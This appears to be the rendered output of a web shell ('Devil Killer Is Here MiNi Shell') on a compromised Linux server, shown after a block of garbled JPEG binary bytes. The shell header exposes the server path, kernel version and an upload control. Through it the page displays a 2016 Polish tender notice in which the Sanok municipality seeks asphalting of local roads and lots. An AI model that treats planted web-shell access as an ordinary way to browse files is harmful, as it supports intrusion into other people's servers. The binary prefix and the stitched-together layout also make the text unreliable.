JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160607/72487-N-2016.html

<p class="kh_header"><b>Sanok: Asfaltowanie dróg gminnych oraz placów na terenie gminy Sanok</b><br>
<b>Numer ogłoszenia: 72487 - 2016; data zamieszczenia: 07.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanok , ul. Kościuszki 23, 38-500 Sanok, woj. podkarpackie, tel. 013 4656551, faks 013 4656553.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminasanok.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Asfaltowanie dróg gminnych oraz placów na terenie gminy Sanok.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja zadania pn. asfaltowanie dróg gminnych oraz placów na terenie gminy Sanok, w zakresie zgodnym z przedmiarami robót, obejmującym następujący zakres:
a) remont odcinka drogi wewnętrznej gminnej /od Zoszaka do Patronika/, dz. nr ewid. 193 w miejscowości Jurowce - dł. 150mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej, mieszanką klińcową o średniej grubości warstwy 5 cm po zagęszczeniu, celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie oczyszczenie rowu z namułu gr.30cm. z wyprofilowaniem skarp oraz wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 10cm,
b) remont odcinka drogi wewnętrznej-gminnej /w kier. Gibusa/, dz. nr ewid. 516/2 w miejscowości Kostarowce - dł. 270mb. przy szerokości jezdni 2,6 m. Remont drogi polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 7cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie zostanie wykonana nawierzchnia jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 14cm,
c) remont odcinka drogi wewnętrznej-gminnej  /w kier. P.Biegi/, dz. nr ewid. 72 w miejscowości Międzybrodzie - dł.56mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 7cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie zostanie wykonana nawierzchnia jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,3m przy średniej grubości 12cm,
d) remont placu postojowego /k/Kościoła/, dz. nr ewid. 1295/3 w miejscowości Mrzygłód - powierzchnia 732 m2. Remont placu polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni gruntowo-żwirowej , warstwą tłucznia zaklinowaną mechanicznie o grubości warstwy 15cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie zostanie wykonana nawierzchnia jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej,
e) remont odcinka drogi gminnej /na Poddębinę/, dz. nr ewid. 3657/2, 3657/1 w miejscowości Niebieszczany - dł.116+92=208mb. przy szerokości jezdni 2,8m. Remont drogi polegać będzie na mechanicznym oczyszczeniu i skropieniu emulsją asfaltową obydwu odcinków istniejącej nawierzchni bitumicznej oraz wyrównaniu masą asfaltową warstwą średniej gr. 2cm na odcinku 116mb. Na tak przygotowanym podłożu zostanie wykonana nakładka bitumiczna z mieszanki mineralno asfaltowej grubości 5cm na odcinku 116mb oraz 4cm na odcinku 92mb po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,3m przy średniej grubości 7cm. na odcinku 116 mb i 4 cm na odcinku 92mb,
f) remont alejki na cmentarzu komunalnym, dz. nr ewid. 478 w miejscowości Niebieszczany - dł.138 mb. przy szerokości jezdni 3,2-3,8m. Remont alejki polegać będzie na usunięciu gruntu zadarnionego oraz mechanicznym oczyszczeniu i skropieniu emulsją asfaltową istniejącej nawierzchni bitumicznej oraz wyrównaniu masą asfaltową warstwą średniej grubości 3cm. Na tak przygotowanym podłożu zostanie wykonana nakładka bitumiczna z mieszanki mineralno asfaltowej grubości 5cm po zagęszczeniu w warstwie ścieralnej,
g) remont odcinka drogi wewnętrznej gminnej /na Dołoszyce/, dz. nr ewid. 115, 265 w miejscowości Pakoszówka - dł.286mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 7cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 14cm. oraz regulacja pionowa studzienek kanalizacji sanitarnej,
h) remont odcinka drogi wewnętrznej gminnej /od skrzyżowania przy sklepie w kier. Kościoła/, dz. nr ewid. 345 w miejscowości Sanoczek - dł. 318,5mb. przy szerokości jezdni 3,0m. Remont drogi polegać będzie na wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 5cm po zagęszczeniu, celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 10cm,
i) remont odcinka drogi wewnętrznej gminnej /na Pustkę/, dz. nr ewid. 58 w miejscowości Srogów Dolny - dł.67mb. przy szerokości jezdni 2,8m. Remont drogi polegać będzie na wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 10cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,3m przy średniej grubości 15cm. oraz oczyszczenie rowu z namułu gr.30cm. z wyprofilowaniem skarp,
j) remont odcinków dróg wewnętrznych gminnych /koło Woźniczyna/, /koło Kotów/ i /koło Maika/, dz. nr ewid. 1051/1,1250/2 i 1340 w miejscowości Strachocina. Droga /koło Woźniczyna/ - dł.135,5mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 10cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 15cm. oraz regulacja pionowa studzienek kanalizacji sanitarnej.
Droga /koło Kotów/ - dł.92mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej , mieszanką klińcową o średniej grubości warstwy 10cm po zagęszczeniu celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 15cm. oraz regulacja pionowa studzienek kanalizacji sanitarnej i ustawienie znaku A-7.
Droga /koło Maika/ - dł.107,5mb. przy szerokości jezdni 2,6m. Remont drogi polegać będzie na wykonaniu koryta drogi na głębokości 20cm. ; dolnej warstwy podbudowy z tłucznia stabilizowanego mechanicznie grubości 15cm i górnej warstwy podbudowy z mieszanki tłuczniowej grubości 8cm. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości 15cm. oraz regulacja pionowa studzienek kanalizacji sanitarnej i ustawienie znaku A-7,
k) remont odcinka drogi wewnętrznej gminnej /za Rzeką/, dz. nr ewid. 57 i 45 w miejscowości Tyrawa Solna - dł.265,0mb. przy szerokości jezdni 2,5-2,8m. Remont drogi polegać będzie na usunięciu gruntu zadarnionego, wyprofilowaniu i wyrównaniu (wzmocnieniu) istniejącej nawierzchni żwirowo-tłuczniowej, mieszanką tłuczniową o średniej grubości warstwy 12cm po zagęszczeniu, na odcinku 105mb. oraz mieszanką klińcową o średniej grubości warstwy 5cm po zagęszczeniu na odcinku 160mb., celem wykorzystania jako podbudowy. Na tak przygotowanej podbudowie wykona się nawierzchnię jezdni z mieszanki mineralno asfaltowej o grubości 4 cm po zagęszczeniu w warstwie wiążącej oraz 3 cm po zagęszczeniu w warstwie ścieralnej. Kolejną czynnością będzie wyprofilowanie i utwardzenie poboczy gruntowych, mieszanką niesortu skalnego, na szerokość 0,5m przy średniej grubości warstwy 12cm. na odcinku 160mb. oraz na szerokość 0,3m przy średniej grubości warstwy 19cm. na odcinku 105mb.
Opisane roboty wykonywane będą w granicach usytuowania pasa drogowego (działki placu w m-ci Mrzygłód).
2. Szczegółowy opis zamówienia przedstawiono w przedmiarach robót,  stanowiących załączniki do niniejszej SIWZ.
Szczegółowy zakres zobowiązań Wykonawcy związanych z wykonaniem zamówienia zawiera wzór umowy, stanowiący integralną część specyfikacji.
3. Zamawiający wymaga udzielenia co najmniej 3-letniej gwarancji jakości i równocześnie biegnącej rękojmi za wady fizyczne za wykonane roboty objęte niniejszym zamówieniem.
4. W przypadku gdy w przedmiarach robót, zostały wskazane nazwy, znaki towarowe lub typy materiałów czy produktów lub normy, aprobaty, specyfikacje czy systemy, o których mowa w art. 30 ust. 1-4 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od określonych w dokumentacji. 
5. W przypadku oferowania rozwiązań równoważnych w stosunku do rozwiązań określonych w dokumentacji projektowej, Wykonawca zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych (do 20% ogólnej wartości przedmiotu zamówienia).
Roboty będą dotyczyły przedmiotu zamówienia określonego w ogłoszeniu o zamówieniu. Zakres obejmował będzie roboty nie ujęte w kosztorysie ofertowym i polegające na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.23.32.26-9, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015, poz. 2164). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszenia o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu potwierdzenia spełniania powyższego warunku Zamawiający wymaga, aby Wykonawca wykazał, iż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 zamówienia polegające na budowie lub remoncie dróg, chodników lub parkingów, o wartości nie mniejszej niż 400 000,00 PLN brutto każde (kwoty w walutach innych niż złote zostaną przeliczone wg kursu średniego NBP obowiązującego w dniu ogłoszenia niniejszego przetargu) wraz z podaniem rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik Nr 6 do niniejszej SIWZ. W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane, wskazane w wykazie robót, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszym punkcie. Wykaz powinien zawierać informacje o robotach niewykonanych lub wykonanych nienależycie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015, poz. 2164). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszenia o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	W celu wykazania spełnienia powyższego warunku należy przedłożyć: - wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia, wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 8 do SIWZ). Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej. Wskazane powyżej uprawnienia budowlane muszą być zgodne z ustawą dnia 07 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2010 r., Nr 243, poz. 1623 z pózn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tekst jednolity Dz. U. Nr 83, poz. 578 z pózn. zm.) lub odpowiadającym im ważnym uprawnieniom budowlanym, wydanym na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w ww. specjalności. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawca zobowiązany jest spełniać warunki wymienione w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2015, poz. 2164). Spełnianie powyższych warunków będzie oceniane na podstawie złożenia wymaganego w SIWZ i ogłoszenia o zamówieniu oświadczenia o spełnianiu warunków udziału w postępowaniu. Złożenie oświadczenia zgodnie z wymaganiami SIWZ oraz ogłoszenia o zamówieniu, będzie potwierdzeniem spełniania wymaganych warunków. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za najważniejsze roboty, dla których należy przedstawić dowody, uznaje się roboty niezbędne do wykazania spełnienia warunku w zakresie wiedzy i doświadczenia określonego w rozdziale X.1.2) SIWZ oraz III.3.2 niniejszego ogłoszenia, tj. wykonanie co najmniej 2 zamówienia polegające na budowie lub remoncie dróg, chodników lub parkingów, o wartości nie mniejszej niż 400 000,00 PLN brutto każde;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

